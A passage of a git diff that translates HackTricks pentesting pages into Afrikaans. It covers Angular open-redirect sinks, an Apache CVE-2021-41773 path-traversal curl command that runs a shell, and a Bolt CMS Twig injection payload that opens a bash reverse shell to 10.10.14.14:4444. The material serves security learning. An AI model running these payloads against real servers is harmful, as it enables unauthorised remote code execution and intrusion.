gebruik. Dit kan ook gebruik word om die blaaier na 'n nuwe bladsy om te lei. As gevolg hiervan stel die beheer oor hierdie voorwerp ons in staat om 'n oop omleiding-kwesbaarheid uit te buit. - ```tsx - //app.component.ts - ... - export class AppComponent { - goToUrl(): void { - window.location.href = "https://google.com/about" - } - } +```tsx +//app.component.ts +... +export class AppComponent { +goToUrl(): void { +window.location.href = "https://google.com/about" +} +} - //app.component.html - - ``` +//app.component.html + +``` - The exploitation process is identical for the following scenarios. -* `window.location.assign()`(and `document.location.assign()`) +Die uitbuitingsproses is identies vir die volgende scenario's. 
+* `window.location.assign()`(en `document.location.assign()`) - This method causes the window to load and display the document at the URL specified. If we have control over this method, it might be a sink for an open redirect attack. +Hierdie metode veroorsaak dat die venster die dokument by die gespesifiseerde URL laai en vertoon. As ons beheer oor hierdie metode het, kan dit 'n put wees vir 'n oop omleiding-aanval. - ```tsx - //app.component.ts - ... - export class AppComponent { - goToUrl(): void { - window.location.assign("https://google.com/about") - } - } - ``` -* `window.location.replace()`(and `document.location.replace()`) +```tsx +//app.component.ts +... +export class AppComponent { +goToUrl(): void { +window.location.assign("https://google.com/about") +} +} +``` +* `window.location.replace()`(en `document.location.replace()`) - This method replaces the current resource with the one at the provided URL. +Hierdie metode vervang die huidige bron met die een by die verskafte URL. - This differs from the `assign()` method is that after using `window.location.replace()`, the current page will not be saved in session History. However, it is also possible to exploit an open redirect vulnerability when we have control over this method. +Die verskil tussen hierdie metode en die `assign()`-metode is dat nadat `window.location.replace()` gebruik is, sal die huidige bladsy nie in die sessiegeskiedenis gestoor word nie. Dit is egter ook moontlik om 'n oop omleiding-kwesbaarheid uit te buit wanneer ons beheer oor hierdie metode het. - ```tsx - //app.component.ts - ... - export class AppComponent { - goToUrl(): void { - window.location.replace("http://google.com/about") - } - } - ``` +```tsx +//app.component.ts +... +export class AppComponent { +goToUrl(): void { +window.location.replace("http://google.com/about") +} +} +``` * `window.open()` - The `window.open()` method takes a URL and loads the resource it identifies into a new or existing tab or window. 
Having control over this method might also be an opportunity to trigger an XSS or open redirect vulnerability. +Die `window.open()`-metode neem 'n URL en laai die bron wat dit identifiseer in 'n nuwe of bestaande oortjie of venster. Beheer oor hierdie metode kan ook 'n geleentheid wees om 'n XSS- of oop omleiding-kwesbaarheid te veroorsaak. - ```tsx - //app.component.ts - ... - export class AppComponent { - goToUrl(): void { - window.open("https://google.com/about", "_blank") - } - } - ``` +```tsx +//app.component.ts +... +export class AppComponent { +goToUrl(): void { +window.open("https://google.com/about", "_blank") +} +} +``` +#### Angular klasse -#### Angular classes +* Volgens die Angular-dokumentasie is die Angular `Document` dieselfde as die DOM-dokument, wat beteken dat dit moontlik is om algemene vektore vir die DOM-dokument te gebruik om kliëntkant kwesbaarhede in die Angular uit te buit. `Document.location` eienskappe en metodes kan moontlike sinks wees vir suksesvolle oop omleidingsaanvalle, soos in die voorbeeld getoon: -* According to Angular documentation, Angular `Document` is the same as the DOM document, which means it is possible to use common vectors for the DOM document to exploit client-side vulnerabilities in the Angular. 
`Document.location` properties and methods might be sinks for successful open redirect attacks as shown in the example: +```tsx +//app.component.ts +import { Component, Inject } from '@angular/core'; +import { DOCUMENT } from '@angular/common'; - ```tsx - //app.component.ts - import { Component, Inject } from '@angular/core'; - import { DOCUMENT } from '@angular/common'; +@Component({ +selector: 'app-root', +templateUrl: './app.component.html', +styleUrls: ['./app.component.css'] +}) +export class AppComponent { +constructor(@Inject(DOCUMENT) private document: Document) { } - @Component({ - selector: 'app-root', - templateUrl: './app.component.html', - styleUrls: ['./app.component.css'] - }) - export class AppComponent { - constructor(@Inject(DOCUMENT) private document: Document) { } +goToUrl(): void { +this.document.location.href = 'https://google.com/about'; +} +} - goToUrl(): void { - this.document.location.href = 'https://google.com/about'; - } - } +//app.component.html + +``` +* Tydens die navorsingsfase het ons ook die Angular `Location`-klas vir oop omleidingskwesbaarhede nagegaan, maar geen geldige vektore is gevind nie. `Location` is 'n Angular-diens wat programme kan gebruik om met die huidige URL van 'n blaaier te kommunikeer. Hierdie diens het verskeie metodes om die gegewe URL te manipuleer - `go()`, `replaceState()` en `prepareExternalUrl()`. Ons kan hulle egter nie gebruik vir omleiding na 'n eksterne domein nie. Byvoorbeeld: - //app.component.html - - ``` -* During the research phase, we also reviewed Angular `Location` class for open redirect vulnerabilities, but no valid vectors were found. `Location` is an Angular service that applications can use to interact with a browser's current URL. This service has several methods to manipulate the given URL - `go()` , `replaceState()`, and `prepareExternalUrl()`. However, we cannot use them for redirection to the external domain. 
For example: +```tsx +//app.component.ts +import { Component, Inject } from '@angular/core'; +import {Location, LocationStrategy, PathLocationStrategy} from '@angular/common'; - ```tsx - //app.component.ts - import { Component, Inject } from '@angular/core'; - import {Location, LocationStrategy, PathLocationStrategy} from '@angular/common'; +@Component({ +selector: 'app-root', +templateUrl: './app.component.html', +styleUrls: ['./app.component.css'], +providers: [Location, {provide: LocationStrategy, useClass: PathLocationStrategy}], +}) +export class AppComponent { +location: Location; +constructor(location: Location) { +this.location = location; +} +goToUrl(): void { +console.log(this.location.go("http://google.com/about")); +} +} +``` - @Component({ - selector: 'app-root', - templateUrl: './app.component.html', - styleUrls: ['./app.component.css'], - providers: [Location, {provide: LocationStrategy, useClass: PathLocationStrategy}], - }) - export class AppComponent { - location: Location; - constructor(location: Location) { - this.location = location; - } - goToUrl(): void { - console.log(this.location.go("http://google.com/about")); - } - } - ``` +Resultaat: `http://localhost:4200/http://google.com/about` +* Die Angular `Router`-klas word hoofsaaklik gebruik vir navigasie binne dieselfde domein en voeg geen addisionele kwesbaarhede tot die toepassing by nie: - Result: `http://localhost:4200/http://google.com/about` -* The Angular `Router` class is primarily used for navigating within the same domain and does not introduce any additional vulnerabilities to the application: +```jsx +//app-routing.module.ts +const routes: Routes = [ +{ path: '', redirectTo: 'https://google.com', pathMatch: 'full' }] +``` - ```jsx - //app-routing.module.ts - const routes: Routes = [ - { path: '', redirectTo: 'https://google.com', pathMatch: 'full' }] - ``` +Resultaat: `http://localhost:4200/https:` - Result: `http://localhost:4200/https:` +Die volgende metodes navigeer ook binne 
die omvang van die domein: - The following methods also navigate within the domain’s scope: +```jsx +const routes: Routes = [ { path: '', redirectTo: 'ROUTE', pathMatch: 'prefix' } ] +this.router.navigate(['PATH']) +this.router.navigateByUrl('URL') +``` - ```jsx - const routes: Routes = [ { path: '', redirectTo: 'ROUTE', pathMatch: 'prefix' } ] - this.router.navigate(['PATH']) - this.router.navigateByUrl('URL') - ``` - -## References +## Verwysings * [Angular](https://angular.io/) -* [Angular Security: The Definitive Guide (Part 1)](https://lsgeurope.com/post/angular-security-the-definitive-guide-part-1) -* [Angular Security: The Definitive Guide (Part 2)](https://lsgeurope.com/post/angular-security-the-definitive-guide-part-2) -* [Angular Security: The Definitive Guide (Part 3)](https://lsgeurope.com/post/angular-security-the-definitive-guide-part-3) +* [Angular Security: The Definitive Guide (Deel 1)](https://lsgeurope.com/post/angular-security-the-definitive-guide-part-1) +* [Angular Security: The Definitive Guide (Deel 2)](https://lsgeurope.com/post/angular-security-the-definitive-guide-part-2) +* [Angular Security: The Definitive Guide (Deel 3)](https://lsgeurope.com/post/angular-security-the-definitive-guide-part-3) * [Angular Security: Checklist](https://lsgeurope.com/post/angular-security-checklist) -* [Workspace and project file structure](https://angular.io/guide/file-structure) -* [Introduction to components and templates](https://angular.io/guide/architecture-components) -* [Source map configuration](https://angular.io/guide/workspace-config#source-map-configuration) -* [Binding syntax](https://angular.io/guide/binding-syntax) -* [Angular Context: Easy Data-Binding for Nested Component Trees and the Router Outlet](https://medium.com/angular-in-depth/angular-context-easy-data-binding-for-nested-component-trees-and-the-router-outlet-a977efacd48) -* [Sanitization and security contexts](https://angular.io/guide/security#sanitization-and-security-contexts) 
+* [Workspace en projeklêerstruktuur](https://angular.io/guide/file-structure) +* [Inleiding tot komponente en sjablone](https://angular.io/guide/architecture-components) +* [Bronkaartkonfigurasie](https://angular.io/guide/workspace-config#source-map-configuration) +* [Binding sintaksis](https://angular.io/guide/binding-syntax) +* [Angular-konteks: Maklike data-binding vir geneste komponentbome en die Router Outlet](https://medium.com/angular-in-depth/angular-context-easy-data-binding-for-nested-component-trees-and-the-router-outlet-a977efacd48) +* [Sanitisering en sekuriteitskontekste](https://angular.io/guide/security#sanitization-and-security-contexts) * [GitHub - angular/dom\_security\_schema.ts](https://github.com/angular/angular/blob/main/packages/compiler/src/schema/dom\_security\_schema.ts) -* [XSS in Angular and AngularJS](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/XSS%20in%20Angular.md) +* [XSS in Angular en AngularJS](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/XSS%20in%20Angular.md) * [Angular Universal](https://angular.io/guide/universal) * [DOM XSS](https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-xss) * [Angular ElementRef](https://angular.io/api/core/ElementRef) * [Angular Renderer2](https://angular.io/api/core/Renderer2) -* [Renderer2 Example: Manipulating DOM in Angular - TekTutorialsHub](https://www.tektutorialshub.com/angular/renderer2-angular/) -* [jQuery API Documentation](http://api.jquery.com/) -* [How To Use jQuery With Angular (When You Absolutely Have To)](https://blog.bitsrc.io/how-to-use-jquery-with-angular-when-you-absolutely-have-to-42c8b6a37ff9) +* [Renderer2-voorbeeld: Manipulering van die DOM in Angular - TekTutorialsHub](https://www.tektutorialshub.com/angular/renderer2-angular/) +* [jQuery API-dokumentasie](http://api.jquery.com/) +* [Hoe om jQuery met Angular te gebruik (Wanneer jy absoluut 
moet)](https://blog.bitsrc.io/how-to-use-jquery-with-angular-when-you-absolutely-have-to-42c8b6a37ff9) * [Angular Document](https://angular.io/api/common/DOCUMENT) * [Angular Location](https://angular.io/api/common/Location) * [Angular Router](https://angular.io/api/router/Router) diff --git a/network-services-pentesting/pentesting-web/apache.md b/network-services-pentesting/pentesting-web/apache.md index eebb504b2..ad31e6f5c 100644 --- a/network-services-pentesting/pentesting-web/apache.md +++ b/network-services-pentesting/pentesting-web/apache.md @@ -1,59 +1,79 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
-# Executable PHP extensions - -Check which extensions is executing the Apache server. To search them you can execute: +# Uitvoerbare PHP-uitbreidings +Kyk watter uitbreidings die Apache-bediener uitvoer. Om dit te soek, kan jy uitvoer: ```bash - grep -R -B1 "httpd-php" /etc/apache2 +grep -R -B1 "httpd-php" /etc/apache2 ``` - -Also, some places where you can find this configuration is: - +Ook, sommige plekke waar jy hierdie konfigurasie kan vind is: ```bash /etc/apache2/mods-available/php5.conf /etc/apache2/mods-enabled/php5.conf /etc/apache2/mods-available/php7.3.conf /etc/apache2/mods-enabled/php7.3.conf ``` - # CVE-2021-41773 +## Oorsig + +CVE-2021-41773 is 'n kwesbaarheid wat gevind is in Apache HTTP Server. Dit maak dit moontlik vir 'n aanvaller om 'n aanval uit te voer en toegang te verkry tot die inhoud van 'n willekeurige lêer op die bediener. + +## Beskrywing + +Hierdie kwesbaarheid word veroorsaak deur 'n fout in die manier waarop die Apache HTTP Server omgaan met die verwerking van 'n spesifieke soort versoek. Wanneer 'n aanvaller 'n spesiale HTTP-versoek stuur na 'n Apache-bediening, kan dit lei tot die uitvoering van 'n padtraversering-aanval. + +'n Padtraversering-aanval maak dit moontlik vir 'n aanvaller om toegang te verkry tot lêers en mappe wat buite die beoogde roete van die webtoepassing lê. In die geval van CVE-2021-41773 kan 'n aanvaller dus toegang verkry tot enige lêer op die bediener, insluitend gevoelige inligting soos konfigurasie-lêers, databasislêers en ander vertroulike data. 
+ +## Impak + +As 'n aanvaller suksesvol is in die uitbuiting van hierdie kwesbaarheid, kan dit lei tot ernstige gevolge, insluitend: + +- Blootstelling van gevoelige inligting +- Verlies van vertroulike data +- Potensiële skending van privaatheid +- Moontlike aanvalle op ander stelsels wat afhanklik is van die Apache-bediening + +## Aanbevelings + +Om die risiko van uitbuiting van hierdie kwesbaarheid te verminder, word die volgende aanbevelings gemaak: + +- **Opgradering**: Installeer die nuutste weergawe van Apache HTTP Server, waarin hierdie kwesbaarheid reggestel is. +- **Pakketbestuurder**: As jy Apache HTTP Server gebruik wat deur 'n pakketbestuurder soos apt of yum verskaf word, verseker dat jy die nuutste opdaterings geïnstalleer het. +- **Toegangsbeheer**: Beperk die toegang tot die Apache-bediening tot vertroude gebruikers en IP-adresse. +- **Webtoepassing-sekuriteit**: Implementeer veilige programeringspraktyke en toepassingsvlak-sekuriteitsmaatreëls om die risiko van padtraversering-aanvalle te verminder. + +## Verwysings + +- [Apache Security Advisory](https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-41773) ```bash curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname' uid=1(daemon) gid=1(daemon) groups=1(daemon) Linux ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md b/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md index dcfdea2bb..0b68f844f 100644 --- a/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md +++ b/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md @@ -1,33 +1,29 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**Check this post:** [**https://www.errno.fr/artifactory/Attacking\_Artifactory**](https://www.errno.fr/artifactory/Attacking\_Artifactory) +**Kyk na hierdie pos:** [**https://www.errno.fr/artifactory/Attacking\_Artifactory**](https://www.errno.fr/artifactory/Attacking\_Artifactory)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/pentesting-web/bolt-cms.md b/network-services-pentesting/pentesting-web/bolt-cms.md index 4ee95a295..07932a89f 100644 --- a/network-services-pentesting/pentesting-web/bolt-cms.md +++ b/network-services-pentesting/pentesting-web/bolt-cms.md @@ -2,48 +2,48 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
## RCE -After login as admin (go to /bot lo access the login prompt), you can get RCE in Bolt CMS: +Nadat jy as admin ingeteken het (gaan na /bot om toegang tot die aanmeldingsvenster te verkry), kan jy RCE in Bolt CMS kry: -* Select `Configuration` -> `View Configuration` -> `Main Configuration` or go the the URL path `/bolt/file-edit/config?file=/bolt/config.yaml` - * Check the value of theme +* Kies `Configuration` -> `View Configuration` -> `Main Configuration` of gaan na die URL-pad `/bolt/file-edit/config?file=/bolt/config.yaml` +* Kontroleer die waarde van die tema
-* Select `File management` -> `View & edit templates` - * Select the theme base found in the previous (`base-2021` in this case) step and select `index.twig` - * In my case this is in the URL path /bolt/file-edit/themes?file=/base-2021/index.twig -* Set your payload in this file via [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php), like: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}` - * And save changes +* Kies `File management` -> `View & edit templates` +* Kies die tema basis wat in die vorige stap gevind is (`base-2021` in hierdie geval) en kies `index.twig` +* In my geval is dit in die URL-pad /bolt/file-edit/themes?file=/base-2021/index.twig +* Stel jou payload in hierdie lêer via [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php), soos: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}` +* En stoor veranderinge
-* Clear the cache in `Maintenance` -> `Clear the cache` -* Access again the page as a regular user, and the payload should be executed +* Maak die cache skoon in `Maintenance` -> `Clear the cache` +* Kry weer toegang tot die bladsy as 'n gewone gebruiker, en die payload behoort uitgevoer te word
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/network-services-pentesting/pentesting-web/buckets/README.md b/network-services-pentesting/pentesting-web/buckets/README.md index 76f831c13..e646325f4 100644 --- a/network-services-pentesting/pentesting-web/buckets/README.md +++ b/network-services-pentesting/pentesting-web/buckets/README.md @@ -1,33 +1,33 @@ -# Buckets +# Emmers
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-Check this page if you want to learn more about enumerating and abusing Buckets: +Kyk na hierdie bladsy as jy meer wil leer oor die opspoor en misbruik van Emmers: {% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe 